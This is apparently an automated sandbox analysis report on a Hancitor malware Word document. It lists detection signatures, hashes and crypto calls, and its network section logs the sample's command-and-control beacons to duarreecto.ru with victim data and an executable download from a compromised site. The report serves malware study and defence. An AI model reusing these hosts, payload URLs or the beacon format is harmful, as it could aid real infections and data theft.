Analysis Report 1118_8732615.doc

Overview

General Information

Sample Name: 1118_8732615.doc
Analysis ID: 319766
MD5: 0f75ad40daec01aee7642795cc544bb3
SHA1: 76334ccc6e92d579495671de47664180517cdf05
SHA256: afba9deb16b5100c5964ca33cd42c2aa6b972ad104efd3d58e0ad8b7070cd5f4
Tags: docHancitormacros

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Hancitor
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Hancitor
Allocates memory in foreign processes
Contains functionality to inject threads in other processes
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
May check the online IP address of the machine
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: 1118_8732615.doc Virustotal: Detection: 15% Perma Link
Source: 1118_8732615.doc ReversingLabs: Detection: 12%
Source: 1118_8732615.doc Virustotal: Detection: 15% Perma Link
Source: 1118_8732615.doc ReversingLabs: Detection: 12%
Machine Learning detection for sample
Source: 1118_8732615.doc Joe Sandbox ML: detected
Source: 1118_8732615.doc Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.rundll32.exe.6f830000.2.unpack Avira: Label: TR/Hijacker.Gen
Source: 3.2.rundll32.exe.6f830000.2.unpack Avira: Label: TR/Hijacker.Gen

Location Tracking:

barindex
Yara detected Hancitor
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6848, type: MEMORY

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832CD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832D17
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832D98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832D55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832D78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832CD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832D17
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832D98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832D55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832D78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F864250 FindFirstFileExA, 3_2_6F864250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F864250 FindFirstFileExA, 3_2_6F864250

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: 22.mp4.0.dr Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: 22.mp4.0.dr Jump to dropped file
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\rundll32.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\rundll32.exe Jump to behavior
Allocates a big amount of memory (probably used for heap spraying)
Source: winword.exe Memory has grown: Private usage: 0MB later: 73MB
Source: winword.exe Memory has grown: Private usage: 0MB later: 73MB
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: api.ipify.org
Source: global traffic DNS query: name: api.ipify.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.7:49731 -> 54.235.142.93:80
Source: global traffic TCP traffic: 192.168.2.7:49731 -> 54.235.142.93:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.7:49731 -> 54.235.142.93:80
Source: global traffic TCP traffic: 192.168.2.7:49731 -> 54.235.142.93:80

Networking:

barindex
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 18 Nov 2020 15:34:59 GMTContent-Type: application/octet-streamContent-Length: 272910Connection: keep-aliveLast-Modified: Tue, 10 Nov 2020 13:28:24 GMTETag: "5faa9578-42a0e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 00 00 00 00 00 2a 04 00 00 00 00 00 e0 00 2f 03 0b 01 02 1e 00 50 03 00 00 26 04 00 00 06 00 00 80 14 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 04 00 00 f5 ea 04 00 02 00 00 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 a4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 9b 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 52 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 4e 03 00 00 10 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 38 00 00 00 00 60 03 00 00 02 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 f8 2d 00 00 00 70 03 00 00 2e 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2f 34 00 00 00 00 00 00 14 90 00 00 00 a0 03 00 00 92 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 40 04 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 a4 0e 00 00 00 50 04 00 00 10 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 60 04 00 00 02 00 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 04 00 00 02 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 18 Nov 2020 15:34:59 GMTContent-Type: application/octet-streamContent-Length: 272910Connection: keep-aliveLast-Modified: Tue, 10 Nov 2020 13:28:24 GMTETag: "5faa9578-42a0e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 00 00 00 00 00 2a 04 00 00 00 00 00 e0 00 2f 03 0b 01 02 1e 00 50 03 00 00 26 04 00 00 06 00 00 80 14 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 04 00 00 f5 ea 04 00 02 00 00 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 a4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 9b 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 52 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 4e 03 00 00 10 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 38 00 00 00 00 60 03 00 00 02 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 f8 2d 00 00 00 70 03 00 00 2e 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2f 34 00 00 00 00 00 00 14 90 00 00 00 a0 03 00 00 92 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 40 04 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 a4 0e 00 00 00 50 04 00 00 10 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 60 04 00 00 02 00 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 04 00 00 02 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 54.235.142.93 54.235.142.93
Source: Joe Sandbox View IP Address: 54.235.142.93 54.235.142.93
Source: Joe Sandbox View IP Address: 54.235.142.93 54.235.142.93
Source: Joe Sandbox View IP Address: 54.235.142.93 54.235.142.93
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View ASN Name: ITL-BG ITL-BG
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: GET /f44.exe HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sturtevantforcongress.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
